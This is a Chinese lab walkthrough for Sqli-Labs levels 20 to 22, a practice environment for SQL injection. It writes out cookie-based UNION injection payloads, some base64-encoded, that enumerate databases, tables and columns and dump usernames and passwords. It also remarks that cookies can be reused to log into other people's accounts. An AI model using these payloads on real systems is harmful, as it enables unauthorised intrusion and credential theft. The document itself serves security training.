Sqli-Labs less20-22

less-20

第20关成功登陆之后会产生一个cookie,作为下次登陆的凭证(可以用于登陆其他人的qq空间)

 这里我依然使用burp suite,其实火狐和谷歌上有许多插件可以改http头和cookie(例如chrome工具: Cookie Editor),掌握一个即可

抓包后发送到repeater:

 改cookie:uname=admin',报错,说明存在注入漏洞

之后构造语句还是老步骤

查看列数:uname=' order by 4 # (注意闭合sql语句)

 判断回显位置:uname='union select 1,2,3#

 爆库:uname='union select 1,2,group_concat(schema_name)from information_schema.schemata#

 爆表:uname='union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'#

 爆列:uname='union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'#

 爆信息:uname='union select 1,2,group_concat(concat_ws('-',username,password))from security.users#

less-21

输入用户名密码登陆:

 抓包观察数据:

 可以看到cookie的内容变成加密的形式,百度后用base64加解密可以解决:

https://base64.us/

 把我们需要输入的语句先进行一遍base64加密即可:

例如判断当前数据库:uname=')union select 1,2,database()#转义之后:

 除了闭合方式和加一步转码外,步骤与上一关完全一致,不再赘述。

less-22

本关抓包并测试发现数据格式变为“”,其他完全一样

“ union select 1,2,database()#转义:InVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=

 

 

 其他语句均相同!

1-22关为基础关,到此结束。

猜你喜欢

转载自www.cnblogs.com/hzk001/p/12231244.html